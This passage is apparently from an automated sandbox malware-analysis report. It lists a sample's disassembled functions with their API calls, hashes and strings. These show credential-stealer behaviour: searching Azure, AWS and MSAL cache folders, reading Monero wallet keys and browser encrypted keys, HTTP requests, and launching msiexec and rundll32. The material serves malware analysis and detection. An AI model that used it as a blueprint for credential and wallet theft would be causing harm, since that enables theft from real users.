                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: b1789ae76288fed21f816f23e6a664bcd0bcbb5072ecb873401c6e1e049754c4
                            • Instruction ID: f5b315ff63e24ade7fb46163785c938f7d067072fb68248fc57ed1456d491e2f
                            • Opcode Fuzzy Hash: b1789ae76288fed21f816f23e6a664bcd0bcbb5072ecb873401c6e1e049754c4
                            • Instruction Fuzzy Hash: 87E10FB1810108ABEB58FBE4DC91FEE777AAF14300F40425EF50676191DF346A4ACB6A
                            Function 00688320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • RegOpenKeyExA.ADVAPI32(00000000,012BB848,00000000,00020019,00000000,006905B6), ref: 006883A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00688426
                            • wsprintfA.USER32 ref: 00688459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0068847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0068848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00688499
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: a269118a21422ac24b33dcd479bc85fe7c4bd09d8a266201facb03a183a1fbb8
                            • Instruction ID: d228dcf69af5ecdcd9acba00cf46b7192d2e596da526da5cb21c3214347dca99
                            • Opcode Fuzzy Hash: a269118a21422ac24b33dcd479bc85fe7c4bd09d8a266201facb03a183a1fbb8
                            • Instruction Fuzzy Hash: 85811EB1911118AFEB68EB50CC91FEA77B9BF08700F4083D9E509A6180DF756B85CFA5
                            Function 00684D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00684DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00684DCD
                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 0068492C
                              • Part of subcall function 00684910: FindFirstFileA.KERNEL32(?,?), ref: 00684943
                            • lstrcat.KERNEL32(?,00000000), ref: 00684E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00684E59
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FDC), ref: 00684971
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FE0), ref: 00684987
                              • Part of subcall function 00684910: FindNextFileA.KERNEL32(000000FF,?), ref: 00684B7D
                              • Part of subcall function 00684910: FindClose.KERNEL32(000000FF), ref: 00684B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00684EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00684EE5
                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 006849B0
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,006908D2), ref: 006849C5
                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 006849E2
                              • Part of subcall function 00684910: PathMatchSpecA.SHLWAPI(?,?), ref: 00684A1E
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,012BF510), ref: 00684A4A
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,00690FF8), ref: 00684A5C
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,?), ref: 00684A70
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,00690FFC), ref: 00684A82
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,?), ref: 00684A96
                              • Part of subcall function 00684910: CopyFileA.KERNEL32(?,?,00000001), ref: 00684AAC
                              • Part of subcall function 00684910: DeleteFileA.KERNEL32(?), ref: 00684B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: d2441f68de8692d2604e61d4c56fd5c670e8570fd84aa37d80fb9a6eed3cbc68
                            • Instruction ID: 417ed71c17d0829e06e11ca6aee17fc06f10bdfeadff549614ae86c910a35dce
                            • Opcode Fuzzy Hash: d2441f68de8692d2604e61d4c56fd5c670e8570fd84aa37d80fb9a6eed3cbc68
                            • Instruction Fuzzy Hash: 0D41E2BA94020467DB94F760EC47FED333EAB60700F004598B689664C2FEB55BC9CB92
                            Function 00689010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0068906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 9d5f481f553cfe5829bbce37c117228561b14337ff5cc0950d99a3ff368f72a3
                            • Instruction ID: 35be42e43381e5ee096168889fde96226cc1df146abe2a2389d380825d904b1b
                            • Opcode Fuzzy Hash: 9d5f481f553cfe5829bbce37c117228561b14337ff5cc0950d99a3ff368f72a3
                            • Instruction Fuzzy Hash: 6F7111B1910208AFDB08EFE4DC89FEEB7B9BF48700F148618F515A7290DB34A945CB65
                            Function 00682E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006831C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0068335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006834EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: 5f97d25b93085d89bfa76c142c3c4a609b6e265e841d07eb3fb444d99e72386f
                            • Instruction ID: 301059d3de22d7c3ea0f540beb5058b71cc1bfa8b81dcd7bcc0c57aa301a8023
                            • Opcode Fuzzy Hash: 5f97d25b93085d89bfa76c142c3c4a609b6e265e841d07eb3fb444d99e72386f
                            • Instruction Fuzzy Hash: C81201B18101189AEB59FBD0DC92FDDB77AAF14300F50425EE90676191EF382B4ACF66
                            Function 006852C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 00676280: InternetOpenA.WININET(00690DFE,00000001,00000000,00000000,00000000), ref: 006762E1
                              • Part of subcall function 00676280: StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676303
                              • Part of subcall function 00676280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00676335
                              • Part of subcall function 00676280: HttpOpenRequestA.WININET(00000000,GET,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00676385
                              • Part of subcall function 00676280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006763BF
                              • Part of subcall function 00676280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006763D1
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685318
                            • lstrlen.KERNEL32(00000000), ref: 0068532F
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00685364
                            • lstrlen.KERNEL32(00000000), ref: 00685383
                            • lstrlen.KERNEL32(00000000), ref: 006853AE
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: ece0aa0de12f3456b8a21dfa4c67db1398d1e18f32a185ca33ed999940ccc57e
                            • Instruction ID: 6ee4e895dbeeda69ed7d5e41ca5816b4bec11e6246b13f475cd2a8b61ff7a990
                            • Opcode Fuzzy Hash: ece0aa0de12f3456b8a21dfa4c67db1398d1e18f32a185ca33ed999940ccc57e
                            • Instruction Fuzzy Hash: A55120709111089BEB58FFA4CD96AED777BAF10300F50421DF80A5A592EF386B46CB66
                            Function 006812D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 6a9db6ca1c6584dd9717363ec7986477fe4e780ca730901278c011b4eade4a14
                            • Instruction ID: 5799a949a441a53962e32add556fced0590d553f3d01727bb90d54ce0b9094a8
                            • Opcode Fuzzy Hash: 6a9db6ca1c6584dd9717363ec7986477fe4e780ca730901278c011b4eade4a14
                            • Instruction Fuzzy Hash: 59C1B5B59001099BCB58FFA0DC89FEA7779BF54300F00469DF50AA7241DB74AA85CFA5
                            Function 00684280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 006842EC
                            • lstrcat.KERNEL32(?,012BEB38), ref: 0068430B
                            • lstrcat.KERNEL32(?,?), ref: 0068431F
                            • lstrcat.KERNEL32(?,012BD698), ref: 00684333
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 00688D90: GetFileAttributesA.KERNEL32(00000000,?,00671B54,?,?,0069564C,?,?,00690E1F), ref: 00688D9F
                              • Part of subcall function 00679CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00679D39
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 006893C0: GlobalAlloc.KERNEL32(00000000,006843DD,006843DD), ref: 006893D3
                            • StrStrA.SHLWAPI(?,012BE9E8), ref: 006843F3
                            • GlobalFree.KERNEL32(?), ref: 00684512
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679AEF
                              • Part of subcall function 00679AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00674EEE,00000000,?), ref: 00679B01
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679B2A
                              • Part of subcall function 00679AC0: LocalFree.KERNEL32(?,?,?,?,00674EEE,00000000,?), ref: 00679B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 006844A3
                            • StrCmpCA.SHLWAPI(?,006908D1), ref: 006844C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006844D2
                            • lstrcat.KERNEL32(00000000,?), ref: 006844E5
                            • lstrcat.KERNEL32(00000000,00690FB8), ref: 006844F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: cc49cf7f3e4d43443ed59b80eed11eb8d7903dc94caee8688eee273d7137e69b
                            • Instruction ID: 08001adbde59dcef8d74f96a53045153f2b6a86879fa6d4151ae279fc2b4adbd
                            • Opcode Fuzzy Hash: cc49cf7f3e4d43443ed59b80eed11eb8d7903dc94caee8688eee273d7137e69b
                            • Instruction Fuzzy Hash: F17147B6900208ABDB54FBE4DC85FEE777ABB48300F04469DF60997181EA34DB45CBA5
                            Function 00671310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006712B4
                              • Part of subcall function 006712A0: RtlAllocateHeap.NTDLL(00000000), ref: 006712BB
                              • Part of subcall function 006712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006712D7
                              • Part of subcall function 006712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006712F5
                              • Part of subcall function 006712A0: RegCloseKey.ADVAPI32(?), ref: 006712FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0067134F
                            • lstrlen.KERNEL32(?), ref: 0067135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00671377
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00671465
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 006714EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
